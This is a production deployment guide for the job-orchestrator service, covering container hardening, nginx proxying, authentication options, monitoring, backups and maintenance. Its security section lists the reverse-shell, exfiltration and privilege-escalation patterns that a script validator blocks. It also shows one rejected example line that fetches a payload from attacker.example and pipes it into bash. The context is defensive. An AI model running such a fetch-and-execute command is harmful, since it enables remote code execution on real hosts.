
Production Deployment

This guide covers best practices for deploying job-orchestrator in production environments.

Architecture Recommendations

Minimum Setup

┌─────────────┐     ┌─────────────┐
│   Server    │────▶│   Client    │
│ (1 instance)│     │ (1 instance)│
└─────────────┘     └─────────────┘

Recommended Setup

                    ┌──────────────┐
                    │ Load Balancer│
                    │   (nginx)    │
                    └──────┬───────┘
                           │
                    ┌──────▼───────┐
                    │    Server    │
                    │  (1 instance)│
                    └──────┬───────┘
                           │
          ┌────────────────┼────────────────┐
          │                │                │
   ┌──────▼──────┐  ┌──────▼──────┐  ┌──────▼──────┐
   │  Client 1   │  │  Client 2   │  │  Client 3   │
   └─────────────┘  └─────────────┘  └─────────────┘

Security

Script Validation

The client includes a built-in script validator that rejects run.sh scripts containing obviously dangerous patterns before execution. This covers destructive commands (rm -rf /, mkfs), network exfiltration tools (curl, wget, socat), reverse shells (/dev/tcp/), privilege escalation (sudo, chmod +s), container escapes (nsenter, docker), obfuscated execution (base64 | bash, python -c), persistence mechanisms (crontab, systemctl), crypto miners, and environment secret access.

This is a sanity check, not a sandbox. It can be bypassed by determined actors. Input scripts are still expected to come from trusted or semi-trusted sources. True isolation must be enforced at the deployment level using the container hardening measures below.
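
For illustration, a run.sh like the first sketch below would trip several of the listed patterns, while the second would pass (hypothetical scripts; the authoritative pattern list lives in the validator itself):

# Rejected: network exfiltration piped into obfuscated execution
curl -s http://attacker.example/payload | base64 -d | bash

# Accepted: ordinary data processing with no flagged patterns
python3 process.py --input input.csv --output results.csv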

Container Hardening

The client executes user-submitted scripts with the full privileges of the client process. Apply all of the following to limit the blast radius:

Measure                 Docker Compose                           Purpose
Read-only rootfs        read_only: true                          Prevent filesystem tampering
Drop all capabilities   cap_drop: [ALL]                          Remove kernel-level privileges
No new privileges       security_opt: [no-new-privileges:true]   Block setuid/setgid escalation
CPU limit               deploy.resources.limits.cpus             Prevent CPU starvation
Memory limit            deploy.resources.limits.memory           Prevent OOM on host
PIDs limit              deploy.resources.limits.pids             Prevent fork bombs
Internal network        networks: [internal]                     Block outbound internet access
Writable tmpfs          tmpfs: [/tmp]                            Provide scratch space on read-only rootfs

Example (applied to the client service):

services:
  client:
    read_only: true
    cap_drop:
      - ALL
    security_opt:
      - no-new-privileges:true
    tmpfs:
      - /tmp
    deploy:
      resources:
        limits:
          cpus: "2"
          memory: 2G
          pids: 256
    networks:
      - internal

networks:
  internal:
    internal: true
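
To confirm the hardening is in effect, a quick smoke test can be run against the live container (a sketch, assuming the service is named client as in the example above):

# A write outside the tmpfs should fail on the read-only rootfs
docker compose exec client sh -c 'touch /test || echo "rootfs is read-only"; touch /tmp/ok && echo "tmpfs writable"'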

Future improvement: Run the container as a non-root user (USER appuser in the Dockerfile). This requires migrating ownership of existing volumes first – see the TODO in the Dockerfile.

Network Security

  1. Never expose clients to the internet

    • Clients execute user-submitted scripts
    • Use internal networks only
    • Block all outbound access from client containers
  2. Use a reverse proxy

    • TLS termination
    • Rate limiting
    • Request filtering
  3. Firewall rules

    # Allow only orchestrator server to reach clients
    iptables -A INPUT -p tcp --dport 9000 -s <server-ip> -j ACCEPT
    iptables -A INPUT -p tcp --dport 9000 -j DROP
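
Note that iptables rules added this way do not survive a reboot; persist them with your distribution's mechanism, for example with iptables-persistent on Debian/Ubuntu:

iptables-save > /etc/iptables/rules.v4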
    

Reverse Proxy (nginx)

# Rate limiting (limit_req_zone must be declared at the http context level,
# not inside a server block)
limit_req_zone $binary_remote_addr zone=upload:10m rate=10r/s;

upstream orchestrator {
    server 127.0.0.1:5000;
}

server {
    listen 443 ssl http2;
    server_name jobs.example.com;

    ssl_certificate /etc/nginx/certs/cert.pem;
    ssl_certificate_key /etc/nginx/certs/key.pem;

    location /upload {
        limit_req zone=upload burst=20 nodelay;
        client_max_body_size 400M;
        proxy_pass http://orchestrator;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }

    location /download {
        proxy_pass http://orchestrator;
        proxy_set_header Host $host;
    }

    location /health {
        proxy_pass http://orchestrator;
    }

    # Block swagger in production (optional)
    location /swagger-ui {
        deny all;
    }
}

Authentication

job-orchestrator does not implement authentication. Options:

  1. Reverse proxy authentication (htpasswd setup shown after this list)

    location / {
        auth_basic "Restricted";
        auth_basic_user_file /etc/nginx/.htpasswd;
        proxy_pass http://orchestrator;
    }
    
  2. Application-level authentication

    • Wrap the API in your application
    • Validate users before calling job-orchestrator
  3. OAuth2 Proxy

    • Use oauth2-proxy in front of the service
    • Integrates with identity providers
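
For option 1, the .htpasswd file referenced above can be created with the htpasswd tool (apache2-utils on Debian/Ubuntu, httpd-tools on RHEL):

# Create the file with an initial user (admin here is an example);
# -c overwrites an existing file
htpasswd -c /etc/nginx/.htpasswd admin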

Resource Planning

Server Requirements

Load Level                    CPU       Memory   Storage
Light (< 100 jobs/day)        1 core    512MB    10GB
Medium (100-1000 jobs/day)    2 cores   1GB      50GB
Heavy (> 1000 jobs/day)       4 cores   2GB      100GB+

Storage depends heavily on job file sizes and retention period.

Client Requirements

Depends entirely on your job workloads:

Job Type                CPU              Memory
Text processing         1 core           512MB
Scientific computing    4-8 cores        8-16GB
ML/Deep learning        8+ cores + GPU   32GB+

Storage Calculation

Storage = (avg_job_size) × (jobs_per_day) × (retention_days)

Example:
- 10MB average job
- 500 jobs/day
- 2 day retention
= 10MB × 500 × 2 = 10GB

Monitoring

Health Checks

# Server health
curl -f http://localhost:5000/health

# Client health
curl -f http://localhost:9000/health

# Client load
curl http://localhost:9000/load
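
The /health endpoints plug directly into container-level health checks; a Compose sketch (assuming the server listens on port 5000 as above and curl is present in the image):

services:
  server:
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:5000/health"]
      interval: 30s
      timeout: 5s
      retries: 3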

Prometheus Metrics (External)

Use a sidecar or external monitoring:

services:
  prometheus:
    image: prom/prometheus
    volumes:
      - ./prometheus.yml:/etc/prometheus/prometheus.yml

  # Monitor container metrics
  cadvisor:
    image: gcr.io/cadvisor/cadvisor
    volumes:
      - /:/rootfs:ro
      - /var/run:/var/run:ro
      - /sys:/sys:ro
      - /var/lib/docker/:/var/lib/docker:ro
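
A minimal prometheus.yml for scraping the cAdvisor sidecar above might look like this (cAdvisor exposes metrics on port 8080 by default):

scrape_configs:
  - job_name: cadvisor
    scrape_interval: 15s
    static_configs:
      - targets: ["cadvisor:8080"]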

Log Aggregation

services:
  server:
    logging:
      driver: "fluentd"
      options:
        fluentd-address: "localhost:24224"
        tag: "job-orchestrator.server"

Backup & Recovery

What to Backup

  1. Server database (DB_PATH)

    • Contains job history and status
    • Critical for job tracking
  2. Server data directory (DATA_PATH)

    • Contains job files and results
    • Large, may use incremental backups

Backup Script

#!/bin/bash
set -euo pipefail

BACKUP_DIR=/backups/job-orchestrator
DATE=$(date +%Y%m%d_%H%M%S)

mkdir -p "${BACKUP_DIR}"

# Backup database (.backup takes a consistent snapshot even while the server runs)
sqlite3 /opt/data/db.sqlite ".backup '${BACKUP_DIR}/db_${DATE}.sqlite'"

# Backup data (rsync transfers only changed files; --delete mirrors removals)
rsync -av --delete /opt/data/ "${BACKUP_DIR}/data/"

# Cleanup old database backups (keep 7 days)
find "${BACKUP_DIR}" -name "db_*.sqlite" -mtime +7 -delete
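
Scheduling is left to the host; a crontab entry running the script nightly might look like this (assuming it is installed as /usr/local/bin/backup-orchestrator.sh):

# m h dom mon dow  command
0 2 * * * /usr/local/bin/backup-orchestrator.sh >> /var/log/orchestrator-backup.log 2>&1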

Recovery

# Stop server
docker compose stop server

# Restore database (pick the desired timestamped backup)
cp /backups/job-orchestrator/db_<timestamp>.sqlite /opt/data/db.sqlite

# Restore data
rsync -av /backups/job-orchestrator/data/ /opt/data/

# Start server
docker compose start server

High Availability

Current Limitations

  • Single server architecture
  • No built-in clustering
  • SQLite allows only a single concurrent writer

Workarounds

  1. Quick recovery

    • Automated health checks
    • Container auto-restart (see the Compose sketch after this list)
    • Fast backup restoration
  2. Stateless clients

    • Clients can be restarted freely
    • Jobs are tracked by server
  3. Future improvements

    • PostgreSQL support (planned)
    • Server clustering (planned)
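
For the container auto-restart mentioned in item 1, a restart policy is a one-line Compose setting (sketch; note that outside Swarm a failing healthcheck alone does not trigger a restart, only container exit does):

services:
  server:
    restart: unless-stopped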

Maintenance

Database Maintenance

# Vacuum database to reclaim space (run while the server is stopped;
# VACUUM needs an exclusive lock on the database)
sqlite3 /opt/data/db.sqlite "VACUUM;"

# Check integrity
sqlite3 /opt/data/db.sqlite "PRAGMA integrity_check;"

Log Rotation

Ensure logs don’t fill disk:

services:
  server:
    logging:
      driver: "json-file"
      options:
        max-size: "50m"
        max-file: "5"

Updates

# Pull latest image
docker pull ghcr.io/rvhonorato/job-orchestrator:latest

# Recreate containers
docker compose up -d

Troubleshooting

See Troubleshooting Guide for common issues.
